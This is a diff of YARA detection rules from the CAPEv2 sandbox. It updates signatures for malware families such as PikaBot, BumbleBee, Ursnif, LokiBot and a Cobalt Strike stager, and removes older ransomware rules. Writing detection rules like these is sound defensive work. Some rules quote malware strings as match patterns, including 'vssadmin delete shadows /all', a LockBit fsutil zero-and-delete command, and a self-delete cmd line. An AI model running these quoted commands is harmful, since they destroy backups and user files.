-rule CAPE_Megacortex : FILE
+rule CAPE_Mykings : FILE
 {
 	meta:
-		description = "MegaCortex Payload"
+		description = "No description has been set in the source file - CAPE"
+		author = "YungBinary"
+		id = "c9d7b061-b76c-595c-a362-6c89c96093d9"
+		date = "2025-10-24"
+		modified = "2025-10-26"
+		reference = "https://x.com/YungBinary/status/1981108948498333900"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/MyKings.yar#L1-L23"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "82647dd23c0247faa045893ec1cf111da2a30528a1b737b59ce1b71172a64473"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		cape_type = "MyKings Payload"
+
+	strings:
+		$s1 = "login.php?uid=0" wide
+		$s2 = "download.txt?rnd=" wide
+		$s3 = "AcceptOK" ascii
+		$s4 = "winsta0\\default" wide
+		$s5 = "base64_ip.txt" wide
+		$s6 = { 70 00 6F 00 77 00 65 00 72 00 74 00 6F 00 6F 00 6C 00 00 00 6B 00 61 00 73 00 70 00 65 00 72 00 73 00 6B 00 79 }
+		$s7 = { 53 00 61 00 66 00 65 00 00 00 00 00 45 00 73 00 65 00 74 }
+		$s8 = { 4E 00 6F 00 64 00 33 00 32 00 00 00 4D 00 61 00 6C 00 77 00 61 00 72 00 65 }
+		$s9 = "Custom C++ HTTP Client/1.0" wide
+		$s10 = "/ru \"SYSTEM\" /f" ascii
+		$s11 = "cmd.exe /C timeout /t 1 & del " wide
+		$s12 = "/login.aspx?uid=0" wide
+		$s13 = "cmd-230812.ru" base64
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) )
+}
+rule CAPE_Zerot : FILE
+{
+	meta:
+		description = "ZeroT Payload"
 		author = "kevoreilly"
-		id = "ea3dd937-2cb1-5b0f-98b8-154aacaf8650"
+		id = "dc5dc18c-2ec6-541d-905c-42543f17b16d"
 		date = "2019-10-30"
 		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/MegaCortex.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "5de1d8241260070241c91b97f18feb2a90069e3b158e863e2d9f568799c244e6"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/ZeroT.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "f60ae25ac3cd741b8bdc5100b5d3c474b5d9fbe8be88bfd184994bae106c3803"
 		score = 75
-		quality = 70
+		quality = 68
 		tags = "FILE"
-		cape_type = "MegaCortex Payload"
+		cape_type = "ZeroT Payload"
 
 	strings:
-		$str1 = ".megac0rtx" ascii wide
-		$str2 = "vssadmin delete shadows /all" ascii
-		$sha256 = {98 2F 8A 42 91 44 37 71 CF FB C0 B5 A5 DB B5 E9}
+		$decrypt = {8B C1 8D B5 FC FE FF FF 33 D2 03 F1 F7 75 10 88 0C 33 41 8A 04 3A 88 06 81 F9 00 01 00 00 7C E0}
+		$string1 = "(*^GF(9042&*"
+		$string2 = "s2-18rg1-41g3j_.;"
+		$string3 = "GET" wide
+		$string4 = "open"
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Lumma_1 : FILE
+rule CAPE_Rozena
 {
 	meta:
-		description = "Lumma Payload"
+		description = "No description has been set in the source file - CAPE"
+		author = "Kevin O'Reilly"
+		id = "38ca9da3-2a0e-500f-8eb8-9de69a7f2da5"
+		date = "2024-03-13"
+		modified = "2024-03-15"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Rozena.yar#L1-L10"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "c415a8108b58a125a604031bb8d73b58a8aae5429b5b765e35fa8a4add9cd135"
+		score = 75
+		quality = 70
+		tags = ""
+		cape_type = "Rozena Payload"
+
+	strings:
+		$ip_port = {FF D5 6A 0A 68 [4] 68 [4] 89 E6 50 50 50 50 40 50 40 50 68 [4] FF D5}
+		$socket = {6A 00 6A 04 56 57 68 [4] FF D5 [0-5] 8B 36 6A 40 68 00 10 00 00 56 6A 00 68}
+
+	condition:
+		all of them
+}
+rule CAPE_Lokibot : FILE
+{
+	meta:
+		description = "LokiBot Payload"
 		author = "kevoreilly"
-		id = "66cb8b1a-e27e-5008-8f52-0e52e6624057"
-		date = "2024-01-05"
-		modified = "2025-07-08"
+		id = "8cdf69e2-ecac-5241-adba-c458cce0610f"
+		date = "2022-02-01"
+		modified = "2022-02-01"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Lumma.yar#L1-L16"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "ca7822292c58af68e7a1610362bf0b5d27c93e3222ceec8d216e05a442008f37"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/LokiBot.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "a5b3d518371138740e913d2d6ce4fa22d3da5cea7e034c7d6b4b502e6bf44b06"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Lumma Payload"
-		packed = "0ee580f0127b821f4f1e7c032cf76475df9724a9fade2e153a69849f652045f8"
-		packed = "23ff1c20b16d9afaf1ce443784fc9a025434a010e2194de9dec041788c369887"
+		cape_type = "LokiBot Payload"
 
 	strings:
-		$decode1 = {C1 (E9|EA) 02 [0-3] 0F B6 (44|4C) ?? FF 83 (F8|F9) 3D 74 05 83 (F8|F9) 2E 75 01 (49|4A) [0-30] 2E 75}
-		$decode2 = {B0 40 C3 B0 3F C3 89 C8 04 D0 3C 09 77 06 80 C1 04 89 C8 C3 89 C8 04 BF 3C}
-		$decode3 = {B0 40 C3 B0 3F C3 80 F9 30 72 ?? 80 F9 39 77 06 80 C1 04 89 C8 C3}
-		$decode4 = {89 C8 04 D0 3C 09 77 ?? [3-11] 89 C8 [0-1] C3 89 C8 04 BF 3C 1A 72 ?? 89 C8 04 9F 3C}
+		$a1 = "DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW"
+		$a2 = "last_compatible_version"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Bitpaymer : FILE
+rule CAPE_Oyster
 {
 	meta:
-		description = "BitPaymer Payload"
+		description = "Oyster Payload"
+		author = "enzok"
+		id = "29443d00-e3de-53fd-b617-df470a30e805"
+		date = "2024-03-01"
+		modified = "2024-05-30"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Oyster.yar#L1-L19"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "8bae0fa9f589cd434a689eebd7a1fde949cc09e6a65e1b56bb620998246a1650"
+		logic_hash = "23ab1518712dbce8319b87785d7ffc0c2b61de82c2bbf533ebf0aae39ec33540"
+		score = 75
+		quality = 70
+		tags = ""
+		cape_type = "Oyster Payload"
+
+	strings:
+		$start_exit = {(05 | 00) 00 00 00 2E 96 1E A6}
+		$content_type = {F6 CE 56 F4 76 F6 96 2E 86 C6 96 36 0E 0E 86 04 5C A6 0E 9E 2A B4 2E 76 A6 2E 76 F6 C2}
+		$domain = {44 5C 44 76 96 86 B6 F6 26 44 34 44}
+		$id = {44 5C 44 64 96 44 DE}
+		$ip_local = {44 5C 44 36 86 C6 F6 36 FA 0E 96 44 34 44}
+		$table_part_1 = {00 80 40 C0 20 A0 60 E0 10 90 50 D0 30 B0 70 F0 08 88 48 C8 28 A8 68}
+		$table_part_2 = {97 57 D7 37 B7 77 F7 0F 8F 4F CF 2F AF 6F EF 1F 9F 5F DF 3F BF 7F FF}
+		$decode = {0F B6 0? 8D ?? FF 8A [2] 0F B6 80 [4] 88 04 ?? 46 0F B6 C? 0F B6 80 [4] 88 4? 01 3B F7}
+
+	condition:
+		4 of them
+}
+rule CAPE_Bumblebeeshellcode_1
+{
+	meta:
+		description = "BumbleBee Loader 2023"
 		author = "kevoreilly"
-		id = "c139b514-a1ba-5d47-8f4d-8e60cddfe2ba"
-		date = "2019-11-27"
-		modified = "2019-11-27"
+		id = "e04f80d0-3a57-51bc-8a54-639c7291a0d8"
+		date = "2022-04-21"
+		modified = "2024-10-29"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/BitPaymer.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "6ae0dc9a36da13e483d8d653276b06f59ecc15c95c754c268dcc91b181677c4c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/BumbleBee.yar#L18-L33"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "d56f8c4e491d0d1b34e396e73750bef9917ca4f708fb6a2681de772a65c13a40"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "BitPaymer Payload"
+		tags = ""
+		cape_type = "BumbleBeeLoader Payload"
+		packed = "51bb71bd446bd7fc03cc1234fcc3f489f10db44e312c9ce619b937fad6912656"
 
 	strings:
-		$decrypt32 = {6A 40 58 3B C8 0F 4D C1 39 46 04 7D 50 53 57 8B F8 81 E7 3F 00 00 80 79 05 4F 83 CF C0 47 F7 DF 99 1B FF 83 E2 3F 03 C2 F7 DF C1 F8 06 03 F8 C1 E7 06 57}
-		$antidefender = "TouchMeNot" wide
+		$setpath = "setPath"
+		$alloc = {B8 01 00 00 00 48 6B C0 08 48 8D 0D [2] 00 00 48 03 C8 48 8B C1 48 89 [3] 00 00 00 8B 44 [2] 05 FF 0F 00 00 25 00 F0 FF FF 8B C0 48 89}
+		$hook = {48 85 C9 74 20 48 85 D2 74 1B 4C 8B C9 45 85 C0 74 13 48 2B D1 42 8A 04 0A 41 88 01 49 FF C1 41 83 E8 01 75 F0 48 8B C1 C3}
+		$algo = {41 8B C1 C1 E8 0B 0F AF C2 44 3B C0 73 6A 4C 8B [3] 44 8B C8 B8 00 08 00 00 2B C2 C1 E8 05 66 03 C2 8B 94 [2] 00 00 00}
+		$cape_string = "cape_options"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		2 of them and not $cape_string
 }
-rule CAPE_Petya : FILE
+rule CAPE_Bumblebee2024
 {
 	meta:
-		description = "Petya Payload"
+		description = "BumbleBee 2024"
+		author = "enzok"
+		id = "ba92b894-912d-593c-acf9-99cb6ad6d61f"
+		date = "2022-04-21"
+		modified = "2024-10-29"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/BumbleBee.yar#L52-L68"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "db58272c1ba74bc6e6a90bdacf7e8feec94be5da2b5123e0475ce86448f3edb2"
+		score = 75
+		quality = 70
+		tags = ""
+		cape_type = "BumbleBee Payload"
+		packed = "a20d56ab2e53b3a599af9904f163bb2e1b2bb7f2c98432519e1fbe87c3867e66"
+
+	strings:
+		$rc4key = {48 [6] 48 [6] E8 [4] 4C 89 AD [4] 4C 89 AD [4] 4C 89 B5 [4] 4C 89 AD [4] 44 88 AD [4] 48 8D 15 [4] 44 38 2D [4] 75}
+		$botidlgt = {4C 8B C1 B? 4F 00 00 00 48 8D 0D [4] E8 [4] 4C 8B C3 48 8D 0D [4] B? 4F 00 00 00 E8 [4] 4C 8B C3 48 8D 0D [4] B? FF 0F 00 00 E8}
+		$botid = {90 48 [6] E8 [4] 4C 89 AD [4] 4C 89 AD [4] 4C 89 B5 [4] 4C 89 AD [4] 44 88 AD [4] 48 8D 15 [4] 44 38 2D [4] 75}
+		$port = {4C 89 6D ?? 4C 89 6D ?? 4c 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8D 05 [4] 44 38 2D [4] 75}
+		$dga1 = {4C 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8B 1D [4] 48 8D 0D [4] E8 [4] 8B F8}
+		$dga2 = {48 8D 0D [4] E8 [4] 8B F0 4C 89 6D ?? 4C 89 6D ?? 4C 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8D 15 [4] 44 38 2D [4] 75}
+
+	condition:
+		$rc4key and all of ( $botid* ) and 2 of ( $port , $port , $dga1 , $dga2 )
+}
+rule CAPE_Ursnifv3_1 : FILE
+{
+	meta:
+		description = "UrsnifV3 Payload"
 		author = "kevoreilly"
-		id = "e581747c-c40f-5689-84b4-d55134b532f7"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "9dd32f80-b535-52a3-91e1-4db005362fd4"
+		date = "2022-05-31"
+		modified = "2023-03-23"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Petya.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "f819261bb34f3b2eb7dc2f843b56be25105570fe902a77940a632a54fbe0d014"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/UrsnifV3.yar#L1-L18"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "501cd52388aba16f9d33b4555f310e1ad58326916b15358a485c701acb87abd8"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Petya Payload"
+		cape_type = "UrsnifV3 Payload"
+		packed = "75827be0c600f93d0d23d4b8239f56eb8c7dc4ab6064ad0b79e6695157816988"
+		packed = "5d6f1484f6571282790d64821429eeeadee71ba6b6d566088f58370634d2c579"
 
 	strings:
-		$a1 = "CHKDSK is repairing sector"
-		$a2 = "wowsmith123456@posteo.net"
-		$a3 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" wide
+		$crypto32_1 = {8B C3 83 EB 01 85 C0 75 0D 0F B6 16 83 C6 01 89 74 24 14 8D 58 07 8B C2 C1 E8 07 83 E0 01 03 D2 85 C0 0F 84 AB 01 00 00 8B C3 83 EB 01 85 C0 89 5C 24 20 75 13 0F B6 16 83 C6 01 BB 07 00 00 00}
+		$crypto32_2 = {8B 45 ?? 0F B6 3? FF 45 [2-4] 8B C? 23 C? 40 40 D1 E? 7?}
+		$crypto32_3 = {F6 46 03 02 75 5? 8B 46 10 40 50 E8 [10-12] 74 ?? F6 46 03 01 74}
+		$crypto32_4 = {C7 44 24 10 01 00 00 00 8B 4? 10 [12] 8B [2] 89 01 8B 44 24 10 5F 5E 5B 8B E5 5D C2 0C 00}
+		$cpuid = {8B C4 FF 18 8B F0 33 C0 0F A2 66 8C D8 66 8E D0 8B E5 8B C6 5E 5B 5D C3}
+		$cape_string = "cape_options"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and 1 of ( $crypto32_* ) and $cpuid and not $cape_string
 }
-rule CAPE_Dreambot : FILE
+rule CAPE_Pikabotloader : FILE
 {
 	meta:
-		description = "Dreambot Payload"
+		description = "Pikabot Loader"
 		author = "kevoreilly"
-		id = "675c2fea-fe48-5afd-9fa1-de919134892f"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "e2c89cdd-0cdb-5367-8aae-2fe685eff972"
+		date = "2023-02-13"
+		modified = "2024-03-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Dreambot.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "29c6d648d5d38667c5824c2d20a83a20448c2ae6054ddddb2b2b7f8bdb69f74b"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/PikaBot.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "7e5f1f2911545ee6bd36b54f2627fbdec1b957f4b91df901dd1c6cbd4dff0231"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Dreambot Payload"
+		cape_type = "PikaBot Loader"
 
 	strings:
-		$a1 = {53 56 33 F6 33 DB C1 6C 24 0C 02 74 2F 8B 02 85 C0 75 11 83 7C 24 0C 02 76 0A 39 42 04 75 05 39 42 08 74 18 43 8A CB D3 C0 33 C6 33 44 24 10 8B F0 89 32 83 C2 04 FF 4C 24 0C 75 D1 5E 5B C2 08 00}
-		$a2 = {53 33 C9 33 DB C1 6C 24 08 02 74 22 56 8B 02 85 C0 8B F0 74 18 33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 E0 5E 5B C2 08 00}
-		$b1 = "Oct  5 2016"
-		$b2 = ".bss"
+		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1}
+		$sysenter1 = {89 44 24 08 8D 85 ?? FC FF FF C7 44 24 04 FF FF 1F 00 89 04 24 E8}
+		$sysenter2 = {C7 44 24 0C 00 00 00 02 C7 44 24 08 00 00 00 02 8B 45 0C 89 44 24 04 8B 45 08 89 04 24 E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 1 of ( $a* ) ) and ( all of ( $b* ) )
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Lockbit : FILE
+rule CAPE_Pikabot : FILE
 {
 	meta:
-		description = "Lockbit Payload"
+		description = "Pikabot Payload"
 		author = "kevoreilly"
-		id = "ec9b4fec-0233-5277-b922-07057c2b4b34"
-		date = "2020-05-14"
-		modified = "2022-06-09"
+		id = "140a3e20-9837-5f66-85dc-af278d75e074"
+		date = "2023-02-13"
+		modified = "2024-03-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Lockbit.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "80ab705c8246a0bd5b3de65146cf32b102f39bf9444bdf1d366b5a794c1229b9"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/PikaBot.yar#L15-L28"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "ed07217c373831a9a67d914854154988696e6fcea70dedabf333385f0e7bb8b7"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Lockbit Payload"
+		cape_type = "PikaBot Payload"
+		packed = "89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9"
 
 	strings:
-		$string1 = "/C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" wide
-		$string2 = "Ransom" ascii wide
-		$crypto = {8B 4D 08 C1 E9 10 0F B6 D1 8B 4D 0C C1 E9 08 0F B6 C9 8B 14 95 [4] 8B 7D FC 33 14 8D [4] 8B CF C1 E9 18 33 14 8D [4] 0F B6 CB 33 14 8D [4] 8B CF 33 10}
-		$decode1 = {8A ?4 34 ?C 0? 00 00 8B 8? 24 ?8 0? 00 00 0F BE ?? 0F BE C? 33 ?? 88 ?? 34 ?? 0? 00 00 46 83 FE 0? 72 DD}
-		$decode2 = {8A 44 24 ?? 30 44 0C ?? 41 83 F9 ?? 72 F2}
+		$decode = {29 D1 01 4B ?? 8D 0C 10 89 4B ?? 85 F6 74 02 89 16}
+		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1}
+		$config = {C7 44 24 [3] 00 00 C7 44 24 [4] 00 89 [1-4] ?? E8 [4] 31 C0 C7 44 24 [3] 00 00 89 44 24 ?? C7 04 24 [4] E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 2 of them )
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Doppelpaymer : FILE
+rule CAPE_Pik23 : FILE
 {
 	meta:
-		description = "DoppelPaymer Payload"
+		description = "PikaBot Payload February 2023"
 		author = "kevoreilly"
-		id = "c8178906-1722-5908-9ad4-7ee1eef39138"
-		date = "2019-11-15"
-		modified = "2022-06-27"
+		id = "fc804c63-fc6c-5b26-92b1-aa5d2fbc4917"
+		date = "2023-02-13"
+		modified = "2024-03-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/DoppelPaymer.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "73a2575671bafc31a70af3ce072d6f94ae172b12202baebba586a02524cb6f9d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/PikaBot.yar#L30-L44"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "59f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1"
+		logic_hash = "71a71df2f2a075294941c54eed06cafaaa4d3294e45b3a0098c1cffddd0438bc"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "DoppelPaymer Payload"
+		cape_type = "PikaBot Payload"
 
 	strings:
-		$getproc32 = {81 FB ?? ?? ?? ?? 74 2D 8B CB E8 ?? ?? ?? ?? 85 C0 74 0C 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3}
-		$cmd_string = "Setup run\\n" wide
+		$rdtsc = {89 55 FC 89 45 F8 0F 31 89 55 F4 89 45 FC 33 C0 B8 05 00 00 00 C1 E8 02 2B C3 3B C1 0F 31 89 55 F0 89 45 F8 8B 44 8D}
+		$int2d = {B8 00 00 00 00 CD 2D 90 C3 CC CC CC CC CC CC CC}
+		$subsys = {64 A1 30 00 00 00 8B 40 18 C3}
+		$rijndael = {EB 0F 0F B6 04 3? FE C? 8A 80 [4] 88 04 3? 0F B6 [3] 7C EA 5? 5? C9 C3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 3 of them
 }
-rule CAPE_Trickbot
+rule CAPE_Cobaltstrikestager
 {
 	meta:
-		description = "TrickBot Payload"
-		author = "sysopfb & kevoreilly"
-		id = "dc88eadd-7b84-5bd0-96d1-aad480632bee"
-		date = "2019-10-30"
-		modified = "2023-02-07"
+		description = "Cobalt Strike Stager Payload"
+		author = "@dan__mayer <daniel@stairwell.com>"
+		id = "eedf71b1-9f27-5a6f-afe8-3ddae47f9a06"
+		date = "2023-01-18"
+		modified = "2023-01-18"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/TrickBot.yar#L1-L20"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "47cc2070b43957601a72745329a9d14fb3fbfd4d2b31cacc35d4ac750dde31ea"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/CobaltStrikeStager.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "6a55b0c3ab5f557dfb7a3f8bd616ede1bd9b93198590fc9d52aa19c1154388c5"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "TrickBot Payload"
-
-	strings:
-		$str1 = "<moduleconfig>*</moduleconfig>" ascii wide
-		$str2 = "group_tag" ascii wide
-		$str3 = "client_id" ascii wide
-		$code1 = {8A 11 88 54 35 F8 46 41 4F 89 4D F0 83 FE 04 0F 85 7E 00 00 00 8A 1D ?? ?? ?? ?? 33 F6 8D 49 00 33 C9 84 DB 74 1F 8A 54 35 F8 8A C3 8D 64 24 00}
-		$code2 = {8B 4D FC 8A D1 02 D2 8A C5 C0 F8 04 02 D2 24 03 02 C2 88 45 08 8A 45 FE 8A D0 C0 FA 02 8A CD C0 E1 04 80 E2 0F 32 D1 8B 4D F8 C0 E0 06 02 45 FF 88 55 09 66 8B 55 08 66 89 11 88 41 02}
-		$code3 = {0F B6 54 24 49 0F B6 44 24 48 48 83 C6 03 C0 E0 02 0F B6 CA C0 E2 04 C0 F9 04 33 DB 80 E1 03 02 C8 88 4C 24 40 0F B6 4C 24 4A 0F B6 C1 C0 E1 06 02 4C 24 4B C0 F8 02 88 4C 24 42 24 0F}
-		$code4 = {53 8B 5C 24 18 55 8B 6C 24 10 56 8B 74 24 18 8D 9B 00 00 00 00 8B C1 33 D2 F7 F3 41 8A 04 2A 30 44 31 FF 3B CF 75 EE 5E 5D 5B 5F C3}
-		$code5 = {50 0F 31 C7 44 24 04 01 00 00 00 8D 0C C5 00 00 00 00 F7 C1 F8 07 00 00 74 1B 48 C1 E2 20 48 8B C8 48 0B CA 0F B6 C9 C1 E1 03 F7 D9 C1 64 24 04 10 FF C1 75 F7 59 C3}
-		$code6 = {53 8B 5C 24 0C 56 8B 74 24 14 B8 ?? ?? ?? ?? F7 E9 C1 FA 02 8B C2 C1 E8 1F 03 C2 6B C0 16 8B D1 2B D0 8A 04 1A 30 04 31 41 3B CF 75 DD 5E 5B 5F C3}
-		$code7 = {B8 ?? ?? 00 00 85 C9 74 32 BE ?? ?? ?? ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? BB ?? ?? ?? ?? 03 F2 8B 2B 83 C3 04 33 2F 83 C7 04 89 29 83 C1 04 3B DE 0F 43 DA}
+		cape_type = "CobaltStrikeStager Payload"
+
+	strings:
+		$smb = { 68 00 B0 04 00 68 00 B0 04 00 6A 01 6A 06 6A 03 52 68 45 70 DF D4 }
+		$http_x86 = { 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 }
+		$http_x64 = { 49 BE 77 69 6E 69 6E 65 74 00 41 56 49 89 E6 4C 89 F1 41 BA 4C 77 26 07 }
+		$dns = { 68 00 10 00 00 68 FF FF 07 00 6A 00 68 58 A4 53 E5 }
 
 	condition:
-		all of ( $str* ) or any of ( $code* )
+		any of them
 }
-rule CAPE_Trickbot_Permadll_UEFI_Module
+rule CAPE_Doppelpaymer : FILE
 {
 	meta:
-		description = "Detects TrickBot Banking module permaDll"
-		author = "@VK_Intel | Advanced Intelligence"
-		id = "ba104164-0a1a-5a4c-8312-7653f7818e96"
-		date = "2019-10-30"
-		modified = "2023-02-07"
+		description = "DoppelPaymer Payload"
+		author = "kevoreilly"
+		id = "c8178906-1722-5908-9ad4-7ee1eef39138"
+		date = "2019-11-15"
+		modified = "2022-06-27"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/TrickBot.yar#L22-L38"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "491115422a6b94dc952982e6914adc39"
-		logic_hash = "564055f56fd19bed8900e6d451ba050b4e9013a9208a3bdc3d3d563567d225d2"
